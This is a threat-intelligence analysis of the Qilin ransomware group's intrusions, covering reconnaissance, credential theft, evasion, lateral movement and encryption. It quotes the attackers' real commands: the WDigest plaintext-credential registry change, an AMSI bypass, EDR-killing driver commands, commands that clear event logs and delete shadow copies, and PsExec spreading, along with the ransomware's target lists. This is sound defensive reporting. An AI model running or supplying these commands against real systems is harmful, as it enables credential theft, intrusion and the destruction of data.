18.10.2025
24 min
812
In the article, you will learn how Qilin operates within the corporate infrastructure, what Windows and PowerShell commands help it move through the network, how to recognize signs of compromise, and what needs to be done to detect an attack in time and stop its spread.
In the second half of 2025, the Qilin ransomware group continued to post victim information on its leak site at a rate of over 40 cases per month, making it one of the most influential ransomware groups in the world. The manufacturing sector was the most affected, followed by professional and scientific services, and wholesale.
While this may be a false flag, some of the scripts used by the attacker contained character encodings that indicate Eastern Europe or the Russian-speaking region.
Among the tools used to exfiltrate data, Talos identified an open-source tool called Cyberduck, which allows files to be transferred to cloud servers. Cyberduck has been widely used in recent cases related to the Qilin ransomware. The artifact logs also show the use of notepad.exe and mspaint.exe, which were used to view sensitive information.
In Qilin cases, dual deployment has been recorded: encryptor_1.exe is distributed between hosts via PsExec, and encryptor_2.exe is launched from a single system to encrypt multiple network resources.
The Qilin ransomware group (formerly Agenda) has been active since approximately July 2022. The group uses a dual extortion strategy, combining file encryption with public disclosure of stolen information. Figure 1 shows the leak site that the attackers use to publish lists of compromised companies.
Over the past few years, Qilin has expanded its operations and is now among the most widespread and damaging ransomware threats globally. The group operates a ransomware-as-a-service (RaaS) business model, in which it develops and distributes ransomware platforms and related tools to affiliates. These affiliates, in turn, attack organizations around the world.
Current reports show that the United States is the hardest hit, followed by Canada, the United Kingdom, France, and Germany.
Figure 3 shows the number of victims whose information was published on the Qilin ransomware leak site.
The data shows that the number of publications peaked at 100 cases in June 2025, and almost the same figure was recorded again in August. While the number of victims fluctuates from month to month, it is worth noting that, except for January, more than 40 cases were registered every month. These findings indicate that Qilin continues to pose a persistent and significant threat.
The sector most affected is manufacturing, accounting for approximately 23% of all reported cases, well ahead of other industries. The second most affected sector is professional and scientific services, accounting for approximately 18%. Wholesale trade comes in third, accounting for approximately 10% of cases.
In the middle range, several key sectors that make up the social infrastructure – healthcare, construction, retail, education and finance – report a similar level of impact, averaging around 5%.
At the lower end, sectors such as services and primary industry show relatively fewer incidents, remaining below 2% on average.
In 2025, Cisco Talos responded to multiple incidents involving the Qilin ransomware. The overall attack flow is illustrated in Figure 5, and the following sections provide a detailed description of the tactics, methods, and procedures (TTPs) observed at each stage.
Talos was unable to definitively identify a single confirmed initial intrusion vector. However, in some cases, it is estimated with moderate confidence that the attackers misused administrative credentials exposed on the darknet to access the VPN, and may have also made changes to Active Directory Group Policies (AD GPOs) that allowed RDP connections to the victim networks.
In the incident illustrated in Figure 6, Talos confirmed that the credentials were exposed on the darknet. Approximately two weeks later, multiple NTLM authentication attempts were made against the VPN, possibly using the leaked credentials. This led to a successful intrusion. From the compromised VPN, the attackers made an RDP connection to the domain controller and the initially compromised host. While this activity temporally correlates with previously observed credential exposure, there is insufficient evidence to establish a definitive causal link between the two events.
Notably, the VPN in question in this case did not have multi-factor authentication (MFA) configured, which would have allowed an attacker with the credentials unrestricted access.
After gaining access to the victim’s network, the attacker executed the nltest.exe and net.exe files to list domain controllers and collect information about domain users.
nltest /dclist:<Domain> net user <Username> /domain
Additionally, traces indicate that the attacker attempted to assess user privilege levels by running the whoami command, listed active processes such as explorer.exe using the tasklist command, and used the netscan tool for further reconnaissance.
C:\WINDOWS\system32\whoami.exe /priv tasklist /FI "IMAGENAME eq explorer.exe" /FO CSV /NH
As described in the “Qilin Ransomware” section below, execution of the ransomware also resulted in the enumeration of hostnames, domain users, groups, and privileges.
In the cases investigated by Talos, a password-protected folder containing a set of tools apparently designed to steal credentials was found. While the archive made it difficult to fully examine each file, its contents indicate the use of mimikatz, several NirSoft password recovery utilities, and a set of custom scripts.
The “!light.bat” batch file contains a reg add command that modifies the WDigest registry setting. By setting “UseLogonCredential” to 1, Windows is configured to store logon credentials in plain text in memory during authentication, which can be used by credential dump tools such as Mimikatz to extract user passwords.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
After running the reg add command, the batch file sequentially called netpass.exe, WebBrowserPassView.exe, BypassCredGuard.exe, SharpDecryptPwd, and finally Mimikatz. In the script (see Figure 8), SharpDecryptPwd is configured to extract, redirect, and store saved authentication data from multiple client applications, including WinSCP, Navicat, Xmanager, TeamViewer, FileZilla, Foxmail, TortoiseSVN, Google Chrome, RDCMan, and SunLogin, thus consolidating the collected credentials for later use or retrieval.
After executing SharpDecryptPwd, !light.bat launched Mimikatz. (Figure 9).
The commands executed via Mimikatz targeted a number of sensitive data and system functions, including cleaning Windows event logs, enabling SeDebugPrivilege, extracting saved passwords from Chrome’s SQLite database, recovering credentials from previous logins, and collecting credentials and configuration data related to RDP, SSH, and Citrix.
pars.vbs formatted and merged the stolen data into a file called “result.txt,” which was then sent to an SMTP server controlled by the attacker (Figure 10). The script specifies the windows-1251 (Cyrillic) character encoding, which may indicate that the attacker or operator is from Eastern Europe or a Russian-speaking region.
After collection, WinRAR packaged the target data, and in some cases, the archives were extracted using open source software. Below are the actual arguments used to run WinRAR.exe. The WinRAR command is configured to exclude the base folder and create the archive without recursively processing subdirectories.
C:\Program Files\WinRAR\WinRAR.exe a -ep1 -scul -r0 -iext -imon1 --. Specify the target files and directories
Additionally, Talos found that attackers used mspaint.exe, notepad.exe, and iexplore.exe to open and inspect files, while simultaneously searching through numerous files for sensitive information.
In recent years, the open-source software Cyberduck, which allows you to transfer files to cloud servers, has been widely used in cases related to the Qilin ransomware. By abusing legitimate cloud services to steal data, the attacker can hide their activities on trusted domains and legitimate web traffic. As shown in Figure 12, the Cyberduck history file indicates that the destination was specified as Backblaze, and a special setting for split/multi-part download was enabled for large file transfers.
Using the stolen credentials described above, the attacker performs privilege escalation and horizontal movement. Talos observed compromised accounts accessing multiple IP addresses and their network resources, as well as multiple NTLM authentication attempts against multiple VPN accounts, possibly using leaked credentials. In addition, to enable remote access, they modify firewall settings, execute commands to change RDP settings via the registry, and perform related actions such as using rdpclip.exe and similar mechanisms.
reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
The following command adds a specific account designated by the attacker to the local administrators group, giving them full control over the system.
C:\Windows\system32\net1 localgroup administrators /add
They also run a command to create a network share named “c”, which grants access to the entire C: drive, and assigns full access to the “Everyone” group, allowing unrestricted access and the ability to change settings.
net share c=c:\ /grant : everyone,full
T1219: Remote Access Software
The attacker installed software that was different from legitimate remote monitoring and management (RMM) tools; this occurred prior to the ransomware being launched. While Talos cannot definitively conclude that the installed RMM was used for horizontal movement, traces of several RMM tools were found, including AnyDesk, Chrome Remote Desktop, Distant Desktop, GoToDesk, QuickAssist, and ScreenConnect. Figure 13 shows an excerpt from the actual ScreenConnect connection log, which indicates that ScreenConnect established a connection to the command and control (C2) server on port 8880.
Confusing Powershell
Figures 14 and 15 show two patterns of obfuscated PowerShell code encoded using numeric encoding designed to avoid detection.
Below is the decoded output of the above code.
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD
Running these commands results in three configuration changes. First, disabling AMSI prevents payloads such as batch files and malware from being executed. Second, disabling TLS certificate validation eliminates the need to communicate with malicious domains or C2 servers. Finally, enabling restricted administration causes RDP authentication to rely on NT hashes or Kerberos tickets instead of passwords. Although passwords are not stored, NT hashes remain on the system and can be used by an attacker to impersonate a user.
Disable AMSI
Disable TLS certificate checking
Enable limited administrator access
Talos has observed attempts to disable EDR using a variety of methods. In general, the commands observed were either directly executing uninstall.exe EDR or attempting to stop the relevant services via the sc command. At the same time, the attackers were also observed running open source tools such as dark-kill and HRSword. The following commands are traces of dark-kill. Instead of running in normal user mode, dark.sys is listed as a driver loaded into the Windows kernel, and the service is started as dark. The traces also show that the attackers re-register the driver from a different path if necessary, and finally remove the service to cover their tracks.
sc create dark type= kernel binPath=dark.sys sc start dark sc create dark type= kernel binPath=C:\Users\<user>\Downloads\DarkKill\Debug\dark.sys sc delete dark
Additionally, to execute “HRSword.exe”, attackers try to run a batch file with administrator privileges using VBScript via mshta by specifying the runas parameter in ShellExecute. Since the logs show that the shortcut file HRSword.lnk was created after executing 1. bat, it is possible that HRSword.exe is launched via this .lnk file.
mshta vbscript:CreateObject(Shell.Application).ShellExecute(cmd.exe,/c C:\Users\xx\xxx\HRSword\HRSWOR~1.BAT ::,,runas,1)
Prior to the launch of the Qilin ransomware, Talos observed instances of remote access tools such as the Cobalt Strike loader and SystemBC being launched. Cobalt Strike had been detected on the compromised host previously, but it is unclear whether Cobalt Strike installed SystemBC.
The Cobalt Strike loader that Talos examined decrypts the encrypted payload contained in the .bss section of the binary file shown in Figure 16, then deploys and executes the Cobalt Strike Beacon in memory.
The embedded encrypted payload is executed in memory according to the thread shown in Figure 17. The CreateThreadpoolWait and SetThreadpoolWait APIs are Windows thread pool APIs. Unlike the common CreateThread API (which immediately creates a new thread and starts executing code at the specified address), they wait for events or changes in the state of the object and then automatically trigger executor callbacks.
In this code, decrypted_buf is registered as a callback function through the arguments to CreateThreadpoolWait, creating a mechanism that will call this callback when the wait object becomes signaled. VirtualProtect then grants execution permission, and MessageBoxA (shown in the figure and intended to protect against sandboxing) requests user interaction. When the user clicks the OK button, SetThreadpoolWait is called. Because EventA was created with an initial signal state (bInitialState = 1), the decrypted code that is already visible in memory is executed immediately.
A special procedure based on RC4 is implemented for decryption: the first 2048 bytes are fully decrypted, and then decryption is performed in 32-byte blocks, in which only the first 24 bytes are decrypted. The remaining 8 bytes remain encrypted, so this behavior is different from standard RC4.
The Cobalt Strike beacon deployed in memory is configured (according to its configuration) to be Cobalt Strike version 4.x, using Malleable C2 to spoof HTTP headers. In this configuration, the http_get_header and http_post_header contain “Host: ocsp.verisign.com”, effectively separating the visible host header from the actual destination so that the traffic appears to be OCSP or certificate distribution traffic. Communication is configured to use HTTPS over TCP port 443 to the Team Server (C2).
Attackers sometimes run only one encryptor, but Talos has also observed cases where two encryptors were deployed. In cases where two encryptors were executed, the first, encryptor_1.exe, was spread across the environment using PsExec (see command below). This command copies the local <encryptor_1>.exe file to a remote IP address, elevates its permissions to run with administrator privileges, and then runs it. The other, “encryptor_2.exe,” is executed from a single system and targets multiple network resources.
cmd /C [PsExec] -accepteula \\IP Address -c -f -h -d -i C:\Users\xxx\<encryptor_1>.exe --password [PASSWORD] --spread --spread-process
A PowerShell command is executed to efficiently retrieve the hostnames of all computers from Active Directory (AD).
powershell -Command Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName
One of the PowerShell commands installs the RSAT-AD-PowerShell module and runs cmdlets related to Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS), allowing you to enumerate domain users, groups, and privileges.
Powershell -Command ServerManagerCmd.exe -i RSAT-AD-PowerShell ; Install-WindowsFeature RSAT-AD-PowerShell ; Add-WindowsCapability -Online -Name 'RSAT.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0'
Next, the Get-WinEvent -ListLog * command is used to list all event logs on the system. Logs containing records (where RecordCount is not 0) are filtered out and the .NET EventLogSession.GlobalSession.ClearLog() method is called to completely clear them.
powershell $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}
Finally, the PowerShell script that targets hosts in virtualized environments is hardcoded.
As part of its PowerShell operation, it establishes a connection to the vCenter server, enumerates all datacenters and clusters in the vCenter environment, and disables HA and DRS in the cluster configurations (see Figure 21).
It then enumerates all ESXi hosts, changes the root password, and enables SSH access. Finally, it downloads an arbitrary binary file to the “/tmp” directory and executes it on all specified hosts. It makes the binary executable with “chmod +x”, sets “/User/execInstalledOnly” to 0 with the $esxiRights command (thereby allowing execution of unsigned binaries), and then executes the payload on all hosts with the Process-ESXis function.
To expand the scope of access to files and increase the impact of the ransomware, the fsutil command is also executed. This command performs symbolic link operations; R2R stands for “Remote to Remote” (from a network resource to another network resource), and R2L stands for “Remote to Local” (from a network resource to a local resource). By executing these two commands and enabling each one accordingly, attackers can achieve different effects. For example, in R2R, a symbolic link on server A can be used to link to files on another server B; in R2L, if a shared symbolic link on server A points to a file on the host, the attacker can access the local host file through this link. These commands can be executed using PsExec.
cmd /C net use cmd /C fsutil behavior set SymlinkEvaluation R2R:1 cmd /C fsutil behavior set SymlinkEvaluation R2L:1
The ransomware changes the startup type of the Volume Shadow Copy Service (VSS) to “Manual” and deletes all shadow copies (volume snapshots) stored by VSS.
cmd /C net start vss cmd /C wmic service where name='vss' call ChangeStartMode Manual cmd /C vssadmin.exe Delete Shadows /all /quiet cmd /C net stop vss cmd /C wmic service where name='vss' call ChangeStartMode Disabled
A ransom note, shown in Figure 23, is created in each encrypted folder. The note basically states that data has been compromised, links to a .onion leak site that requires a Tor connection, and provides a URL (specified by IP address) that victims who do not have a Tor environment can access without Tor. It also lists the types of data included and warns of the consequences of ignoring the demands.
In addition, the “Credentials” section states that each victim company is assigned a unique company ID as a file extension, and that the domain URL listed in the note can be used to access the site using this unique login ID and password.
The configuration for Qilin Ransomware includes file encryption settings, lists of services and processes to stop, and a list of accounts specific to individual objects. There are eight items, four of which are listed below:
“extension_black_list” contains file extensions that will not be encrypted.
“extension_white_list” specifies extensions that this ransomware will explicitly encrypt.
“filename_black_list” contains filenames that will not be encrypted.
“directory_black_list” contains a list of directories that will not be encrypted.
We also found two lists named “white_symlink_dirs” and “white_symlink_subdirs”. In the Qilin ransomware sample we analyzed, white_symlink_dirs is empty, and the only thing that contains white_symlink_subdirs is the entry “ClusterStorage”.
ClusterStorage is the name of a directory used by the Windows Server Failover Cluster (Cluster Shared Volumes or CSV). CSV files typically contain critical files for organizations, such as Hyper-V virtual machines (VHDX) and databases. This shows that the ransomware aims to increase its impact by attacking not only regular user directories, but also the virtualization and cluster infrastructure directly as hostages. Therefore, files in the ClusterStorage subdirectories are explicitly listed as targets for encryption. The fact that white_symlink_dirs is empty is likely intended to avoid following symbolic links that could cause infinite loops or double encryption.
The “process_black_list” and “win_services_black_list” specify processes and services to be terminated, including those related to databases, backup, security, and remote management. Notably, as shown in Figure 24, this configuration also had a hardcoded domain, username, and password specific to the victim’s environment. This indicates that the attackers preloaded intelligence into the ransomware to facilitate privilege escalation and related actions.
blacklist_extension:
["themepack", "nls", "diapkg", "msi", "lnk", "exe", "scr", "bat", "drv", "rtp", "msp", "prf", "msc", "ico", "key", "ocx", "diagcab", "diagcfg", "pdb", "wpx", "hlp", "icns", "rom", "dll", "msstyles", "mod", "ps1", "ics", "hta", "bin", "cmd", "ani", "386", "lock", "cur", "idx", "sys", "com", "deskthemepack", "shs", "theme", "mpa", "nomedia", "spl", "cpl", "adv", "icl", "msu", "company_id"]
whitelist_extensions:
["mdf", "ldf", "bak", "vib", "vbk", "vbm", "vrb", "vmdk", "abk", "bkz", "sqb", "trn", "backup", "bkup", "old", "tibx", "pfi", "pvhd", "pbf", "dim", "gho", "vpcbackup", "arc", "mtf", "bkf", "dr"]
blacklist_filename:
["desktop.ini", "autorun.ini", "ntldr", "bootsect.bak", "thumbs.db", "boot.ini", "ntuser.dat", "iconcache.db", "bootfont.bin", "ntuser.ini", "ntuser.dat.log", "autorun.inf", "bootmgr", "bootmgr.efi", "bootmgfw.efi", "#recycle", "autorun.inf", "boot.ini", "bootfont.bin", "bootmgr", "bootmgr.efi", "bootmgfw.efi", "desktop.ini", "iconcache.db", "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini", "thumbs.db", "#recycle", "bootsect.bak"]
directory_blacklist:
["windows", "system volume information", "intel", "admin$", "ipc$", "sysvol", "netlogon", "$windows.~ws", "application data", "mozilla", "program files (x86)", "program files", "$windows.~bt", "msocache", "tor browser", "programdata", "boot", "config.msi", "google", "perflogs", "appdata", "windows.old", "appdata", "..", ".", "boot", "windows", "windows.old", "$recycle.bin", "admin$"]
white_symlink_subdires:
["ClusterStorage"]
["vmms", "vmwp", "vmcompute", "agntsvc", "dbeng50", "dbsnmp", "encsvc", "excel", "firefox", "infopath", "isqlplussvc", "sql", "msaccess", "mspub", "mydesktopqos", "mydesktopservice", "notepad", "ocautoupds", "ocomm", "ocssd", "onenote", "oracle", "outlook", "powerpnt", "sqbcoreservice", "steam", "synctime", "tbirdconfig", "thebat", "thunderbird", "visio", "winword", "wordpad", "xfssvccon", "bedbh", "vxmon", "benetns", "bengien", "pvlsvr", "beserver", "raw_agent_svc", "vsnapvss", "cagservice", "qbidpservice", "qbdbmgrn", "qbcfmonitorservice", "sap", "teamviewer_service", "teamviewer", "tv_w32", "tv_x64", "cvmountd", "cvd", "cvfwd", "cvods", "saphostexec", "saposcol", "sapstartsrv", "avagent", "avscc", "dellsystemdetect", "enterpriseclient", "veeamnfssvc", "veeamtransportsvc", "veeamdeploymentsvc", "mvdesktopservice"]
win_services_black_list:
["vmms", "mepocs", "memtas", "veeam", "backup", "vss", "sql", "msexchange", "sophos", "msexchange", "msexchange\\$", "wsbexchange", "pdvfsservice", "backupexecvssprovider", "backupexecagentaccelerator", "backupexecagentbrowser", "backupexecdivecimediaservice", "backupexecjobengine", "backupexecmanagementservice", "backupexecrpcservice", "gxblr", "gxvss", "gxclmgrs", "gxcvd", "gxcimgr", "gxmmm", "gxvsshwprov", "gxfwd", "sapservice", "sap", "sap\\$", "sapd\\$", "saphostcontrol", "saphostexec", "qbcfmonitorservice", "qbdbmgrn", "qbidpservice", "acronisagent", "veeamnfssvc", "veeamdeploymentservice", "veeamtransportsvc", "mvarmor", "mvarmor64", "vsnapvss", "acrsch2svc", "(.*?)sql(.*?)"]
Accounts:
Upon launch, a QLOG folder is created in %TEMP% and several ThreadId({Number}).LOG files are created. These allow the attacker to view detailed logs of the encryption process.
The ransomware creates a JPG image in %TEMP%, which is used as wallpaper, and modifies the following registry values.
HKEY_CURRENT_USER\Control Panel\Desktop\Wallpaper (Example) Value: C:\%TEMP%ElSDJGep.jpg
Once the ransomware is executed, the attacker achieves persistence through both task scheduling and registry modifications. First, a scheduled task named “TVInstallRestore” is created, configured to run at logon using the /SC ONLOGON argument. To disguise itself as a legitimate tool, the ransomware file is named “TeamViewer_Host_Setup – <encryptor_2>.exe”, using the TeamViewer branding (which was installed as an RMM tool prior to compromise). Second, to ensure that the ransomware executes after each reboot, its executable is added as a value to the RUN registry key.
This combination of scheduled tasks and registry entries allows the ransomware to maintain persistence across system reboots and user logons.
C:\WINDOWS\system32\schtasks /Create /TN TVInstallRestore /TR "C:\-INSTALLERS\TeamViewer_Host_Setup - <encryptor_2>.exe /RESTORE" /RU SYSTEM /SC ONLOGON /F
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Key *random-alphabet in lowercase letters Key Value C:\Users\Administrator\Desktop\<encryptor_2>.exe --password [PASSWORD]--no-admin;
Qilin remains one of the most aggressive ransomware groups. It uses stolen VPN credentials, legitimate tools like Cyberduck and WinRAR, and sophisticated scripts to bypass protection and further encrypt networks.
Its activities prove that modern RaaS attacks are a full-fledged business. To mitigate risks, companies should enable MFA, monitor PowerShell activity, and monitor data transfers to the cloud.
Qilin is a reminder that even familiar tools can become weapons in the hands of cybercriminals.
